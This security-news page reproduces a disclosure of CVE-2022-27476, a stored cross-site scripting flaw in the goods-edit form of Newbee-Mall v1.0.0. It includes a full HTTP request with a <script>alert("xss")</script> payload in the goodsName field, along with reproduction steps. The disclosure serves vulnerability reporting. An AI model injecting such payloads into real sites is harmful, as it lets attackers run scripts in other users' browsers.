Security
Headlines
HeadlinesLatestCVEs

Headline

CVE-2022-27476: There is a Cross site scripting vulnerability exists in newbee-mall · Issue #64 · newbee-ltd/newbee-mall

A cross-site scripting (XSS) vulnerability at /admin/goods/update in Newbee-Mall v1.0.0 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the goodsName parameter.

CVE
#xss#vulnerability#web#windows#apple#js#git

[Suggested description]
There is a cross site scripting vulnerability in the commodity information modification module in the main version of NewBee mall. The vulnerability stems from the fact that the form submission module that modifies the commodity information does not restrict or escape the sensitive characters entered, causing the execution of malicious JS code to trigger JS pop-up.

[Vulnerability Type]
Cross site scripting vulnerability

[Vendor of Product]
https://github.com/newbee-ltd/newbee-mall

[Affected Product Code Base]
v1.0.0

[Affected Component]

POST /admin/goods/update HTTP/1.1
Host: localhost:28089
Content-Length: 392
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="92"
Accept: */*
X-Requested-With: XMLHttpRequest
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36
Content-Type: application/json
Origin: http://localhost:28089
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: http://localhost:28089/admin/goods/edit/10907
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Cookie: locale=zh-cn; Hm_lvt_a4980171086658b20eb2d9b523ae1b7b=1645520663,1645696647; JSESSIONID=5B28A8C926D035BCC4A809131899B51D
Connection: close

{"goodsId":"10907","goodsName":"鐖辩柉<script>alert(\"xss\")</script>","goodsIntro":"xxx","goodsCategoryId":"47","tag":"鐖辩柉","originalPrice":"1","sellingPrice":"1","stockNum":"0","goodsDetailContent":"<p>hhh</p><p><br/></p>","goodsCoverImg":"http://localhost:28089/upload/20220303_10153124.html","goodsCarousel":"http://localhost:28089/upload/20220303_10153124.html","goodsSellStatus":"0"}

[Impact Code execution]
true

[Vulnerability proof]
1.Access address http://localhost:28089/admin/goods , select the commodity information to be modified and enter information editing.
image

2.Enter <script>alert(“xss”)</script> in the input box and click Save to complete the form information submission.
image

image

3.The pop-up window is triggered when the page is refreshed, and the loophole reproduction is completed
image

CVE: Latest News

CVE-2023-50976: Transactions API Authorization by oleiman · Pull Request #14969 · redpanda-data/redpanda
CVE-2023-6905
CVE-2023-6903
CVE-2023-6904
CVE-2023-3907